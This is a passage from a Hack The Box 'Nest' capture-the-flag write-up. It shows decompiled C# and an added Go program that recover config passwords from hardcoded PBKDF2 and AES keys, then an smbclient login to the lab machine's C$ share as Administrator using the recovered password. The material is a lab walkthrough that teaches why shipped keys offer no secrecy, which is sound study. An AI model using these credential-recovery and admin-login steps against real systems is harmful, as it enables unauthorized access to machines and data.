            Rfc2898DeriveBytes rfc2898DeriveByte = new Rfc2898DeriveBytes(passPhrase, numArray, passwordIterations);
            byte[] numArray1 = rfc2898DeriveByte.GetBytes(checked((int)Math.Round((double)keySize / 8)));
            AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider()
            {
                Mode = CipherMode.CBC
            };
            ICryptoTransform cryptoTransform = aesCryptoServiceProvider.CreateEncryptor(numArray1, bytes);
            using (MemoryStream memoryStream = new MemoryStream())
            {
                using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, CryptoStreamMode.Write))
                {
                    cryptoStream.Write(bytes1, 0, checked((int)bytes1.Length));
                    cryptoStream.FlushFinalBlock();
                    byte[] array = memoryStream.ToArray();
                    memoryStream.Close();
                    cryptoStream.Close();
                    base64String = Convert.ToBase64String(array);
                }
            }
            return base64String;
        }

        // ############################## ADDED CODE ###################################
        // Entry point added by me: decrypt the Ldap.conf password with the class's own routine.
        public static void Main()
        {
            Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
        }
        // #############################################################################
    }
}
The way I went about this was to run it inside an online .NET compiler.
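Both Utils.vb (RU Scanner) and the decompiled CR class use the very same construction: PBKDF2 over a hardcoded passphrase and salt, then AES-256-CBC with a hardcoded ASCII IV and PKCS#7 padding. As an added example that is not code from the box or from this write-up, the Go program below reimplements that routine once, parameterised for both binaries, so either config password can be recovered offline without Visual Studio or a decompiler. It assumes that .NET's Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1 and that AesCryptoServiceProvider defaults to PKCS#7 padding (both true for .NET Framework); the passphrases, salts, iteration counts, IVs and ciphertexts are the ones shown on this page, and the lesson for defenders is that a key shipped next to its ciphertext, in source or in a decompilable binary, offers no confidentiality at all.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// pbkdf2SHA1 reimplements what .NET's Rfc2898DeriveBytes does by default:
// PBKDF2 (RFC 8018) with HMAC-SHA1 as the PRF.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	hashLen := prf.Size()
	numBlocks := (keyLen + hashLen - 1) / hashLen
	out := make([]byte, 0, numBlocks*hashLen)
	blockIndex := make([]byte, 4)
	for i := 1; i <= numBlocks; i++ {
		// U_1 = PRF(P, S || INT_32_BE(i))
		binary.BigEndian.PutUint32(blockIndex, uint32(i))
		prf.Reset()
		prf.Write(salt)
		prf.Write(blockIndex)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		// U_j = PRF(P, U_{j-1});  T_i = U_1 xor U_2 xor ... xor U_c
		for j := 2; j <= iterations; j++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// DecryptConfigPassword mirrors Utils.Decrypt / CR.RD from the box: derive a
// keySize-bit AES key with PBKDF2-SHA1, then AES-CBC decrypt the base64
// ciphertext with the ASCII IV and strip PKCS#7 padding.
func DecryptConfigPassword(cipherTextB64, passPhrase, saltValue string, iterations int, initVector string, keySize int) (string, error) {
	cipherText, err := base64.StdEncoding.DecodeString(cipherTextB64)
	if err != nil {
		return "", err
	}
	iv := []byte(initVector)
	if len(iv) != aes.BlockSize {
		return "", errors.New("IV must be exactly 16 ASCII bytes")
	}
	if len(cipherText) == 0 || len(cipherText)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	key := pbkdf2SHA1([]byte(passPhrase), []byte(saltValue), iterations, keySize/8)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	plain := make([]byte, len(cipherText))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, cipherText)
	// .NET's CryptoStream removes the PKCS#7 padding for the caller; do it by hand here
	// and treat bad padding as "wrong key, IV or parameters" rather than returning garbage.
	pad := int(plain[len(plain)-1])
	if pad < 1 || pad > aes.BlockSize || pad > len(plain) ||
		!bytes.Equal(plain[len(plain)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("invalid PKCS#7 padding (wrong key, IV or parameters?)")
	}
	return string(plain[:len(plain)-pad]), nil
}

// DecryptRUScanner uses the constants hardcoded in Utils.vb (RU Scanner).
func DecryptRUScanner(cipherTextB64 string) (string, error) {
	return DecryptConfigPassword(cipherTextB64, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
}

// DecryptHqkLdap uses the constants hardcoded in the decompiled CR class (HqkLdap.exe).
func DecryptHqkLdap(cipherTextB64 string) (string, error) {
	return DecryptConfigPassword(cipherTextB64, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
}

func main() {
	// Ciphertexts taken from RU_config.xml and Ldap.conf as shown in this write-up.
	ru, err := DecryptRUScanner("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
	fmt.Println("RU_config.xml <Password>:", ru, err)
	ldap, err := DecryptHqkLdap("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")
	fmt.Println("Ldap.conf Password=:", ldap, err)
}
```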
Running the code gives us the decrypted password: XtH4nkS4Pl4y1nGX. With the Administrator password in hand, we can connect to the C$ share as Administrator and grab the root.txt flag.
root@kali:~/htb/nest# smbclient -U Administrator%XtH4nkS4Pl4y1nGX \\\\10.10.10.178\\C$
Domain=[HTB-NEST] OS=[] Server=[]
Try "help" to get a list of possible commands.
smb: \> ls
  $Recycle.Bin                      DHS        0  Mon Jul 13 22:34:39 2009
  Boot                              DHS        0  Sat Jan 25 16:15:35 2020
  bootmgr                          AHSR   383786  Fri Nov 19 23:40:08 2010
  BOOTSECT.BAK                     AHSR     8192  Tue Aug  6 01:16:26 2019
  Config.Msi                        DHS        0  Sat Jan 25 16:49:12 2020
  Documents and Settings            DHS        0  Tue Jul 14 01:06:44 2009
  pagefile.sys                      AHS 2146881536  Tue Jun  9 16:59:51 2020
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Wed Aug  7 19:40:50 2019
  Program Files (x86)                DR        0  Tue Jul 14 01:06:53 2009
  ProgramData                        DH        0  Mon Aug  5 16:24:41 2019
  Recovery                          DHS        0  Mon Aug  5 16:22:25 2019
  restartsvc.bat                      A       33  Wed Aug  7 19:43:09 2019
  Shares                              D        0  Tue Aug  6 09:59:55 2019
  System Volume Information         DHS        0  Tue Aug  6 00:17:38 2019
  Users                              DR        0  Thu Aug  8 13:19:40 2019
  Windows                             D        0  Sat Jan 25 16:22:42 2020

                10485247 blocks of size 4096. 6543143 blocks available
smb: \> cd ./Users
smb: \Users\> ls
  .                                  DR        0  Thu Aug  8 13:19:40 2019
  ..                                 DR        0  Thu Aug  8 13:19:40 2019
  Administrator                       D        0  Mon Aug  5 16:33:56 2019
  All Users                         DHS        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                      DHS        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  Service_HQK                         D        0  Thu Aug  8 13:19:41 2019
  TempUser                            D        0  Fri Aug  9 08:33:50 2019

                10485247 blocks of size 4096. 6543143 blocks available
smb: \Users\> cd ./Administrator\
smb: \Users\Administrator\> ls
  .                                   D        0  Mon Aug  5 16:33:56 2019
  ..                                  D        0  Mon Aug  5 16:33:56 2019
  AppData                            DH        0  Mon Aug  5 16:27:25 2019
  Application Data                  DHS        0  Mon Aug  5 16:27:25 2019
  Contacts                           DR        0  Sat Jan 25 17:02:44 2020
  Cookies                           DHS        0  Mon Aug  5 16:27:25 2019
  Desktop                            DR        0  Sun Jan 26 02:20:50 2020
  Documents                          DR        0  Sat Jan 25 17:02:44 2020
  Downloads                          DR        0  Sat Jan 25 17:02:44 2020
  Favorites                          DR        0  Sat Jan 25 17:02:44 2020
  Links                              DR        0  Sat Jan 25 17:02:44 2020
  Local Settings                    DHS        0  Mon Aug  5 16:27:25 2019
  Music                              DR        0  Sat Jan 25 17:02:44 2020
  My Documents                      DHS        0  Mon Aug  5 16:27:25 2019
  NetHood                           DHS        0  Mon Aug  5 16:27:25 2019
  NTUSER.DAT                        AHS   786432  Sun Jan 26 02:31:38 2020
  ntuser.dat.LOG1                   AHS   262144  Tue Jun  9 17:24:53 2020
  ntuser.dat.LOG2                   AHS        0  Mon Aug  5 16:27:25 2019
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf                          AHS    65536  Mon Aug  5 16:27:27 2019
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms  AHS   524288  Mon Aug  5 16:27:27 2019
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms  AHS   524288  Mon Aug  5 16:27:27 2019
  ntuser.ini                         HS       20  Mon Aug  5 16:27:25 2019
  Pictures                           DR        0  Sat Jan 25 17:02:44 2020
  PrintHood                         DHS        0  Mon Aug  5 16:27:25 2019
  Recent                            DHS        0  Mon Aug  5 16:27:25 2019
  Saved Games                        DR        0  Sat Jan 25 17:02:44 2020
  Searches                           DR        0  Sat Jan 25 17:02:44 2020
  SendTo                            DHS        0  Mon Aug  5 16:27:25 2019
  Start Menu                        DHS        0  Mon Aug  5 16:27:25 2019
  Templates                         DHS        0  Mon Aug  5 16:27:25 2019
  Videos                             DR        0  Sat Jan 25 17:02:44 2020

                10485247 blocks of size 4096. 6543143 blocks available
smb: \Users\Administrator\> cd ./Desktop
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 02:20:50 2020
  ..                                 DR        0  Sun Jan 26 02:20:50 2020
  desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
  root.txt                            A       32  Mon Aug  5 18:27:26 2019

                10485247 blocks of size 4096. 6543143 blocks available
And we're done with this box! This was a fun one, definitely different from what you would usually see on an easy-rated box: no exploits at all, just enumeration, leaked credentials, hardcoded crypto keys and an alternate data stream.
Hope this article was useful in any way! Thoughts and remarks are welcome!
Originally published at https://epliu_2555.hashnode.dev.